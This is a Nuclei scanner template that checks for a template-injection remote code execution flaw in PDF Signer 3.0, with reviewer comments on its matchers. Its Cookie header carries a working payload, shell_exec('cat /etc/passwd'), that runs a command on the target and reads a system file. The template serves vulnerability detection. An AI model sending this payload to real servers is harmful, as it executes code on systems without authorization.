nuclei-templates/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml


# Detection template for the PDF Signer 3.0 template-injection issue described
# in info.description. It issues one GET request and reports a finding only
# when both matchers at the bottom succeed (matchers-condition: and).
id: pdf-signer-ssti-to-rce

info:
  name: PDF Signer 3.0 - Template Injection
  author: madrobot
  severity: critical
  description: >-
    PDF Signer 3.0 is susceptible to a template injection which allows code
    execution, due to improper cookie handling and an improper CSRF
    implementation. An attacker can execute code on the server in the context
    of the web server.
  classification:
    # Vector: network-reachable, no privileges and no user interaction needed.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    # CWE-1336: improper neutralization of special elements in a template
    # engine.
    cwe-id: CWE-1336
  metadata:
    max-request: 1
  tags: ssti,rce,csrf

http:
  - method: GET
    path:
      - '{{BaseURL}}'
    headers:
      # The CSRF-TOKEN cookie value carries a template expression; per the
      # description, the application's cookie handling lets it reach the
      # template engine. The probe only reads /etc/passwd as a marker.
      # Defenders: a "{{" sequence inside a CSRF-TOKEN cookie in request logs
      # is the observable trace of this check.
      # NOTE(review): the simcify value looks like a fixed sample session id;
      # confirm the target does not require a live session for the check.
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
    # Keeps the engine from rejecting the literal "{{shell_exec(...)}}" above
    # as an unresolved template variable, so it is sent unchanged.
    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # Matches a passwd-style root entry (uid 0, gid 0) in the response body.
      # NOTE(review): the pattern is not tied to the rnqvt/to5gw markers
      # around the payload, so any 200 page that already contains such a line
      # would also match. A target without /etc/passwd (non-Unix host) never
      # matches, so a negative result there is not evidence of a fix.
      - type: regex
        regex:
          - 'root:.*:0:0:'
        part: body
# NOTE(review): the "# digest:" trailer after this block presumably signs the
# template content; re-sign after any edit and confirm with the project's
# signing workflow.
# digest: 490a004630440220346f42ec245dba5a5da138043cc2f9e8f3e5979db4c9db118d907d6c5dbbc44602203f58036f592e1767eb81a87cdf8169f704f3715b094ef1cadbf36dba96651657:922c64590222798bb761d5b6d8e72950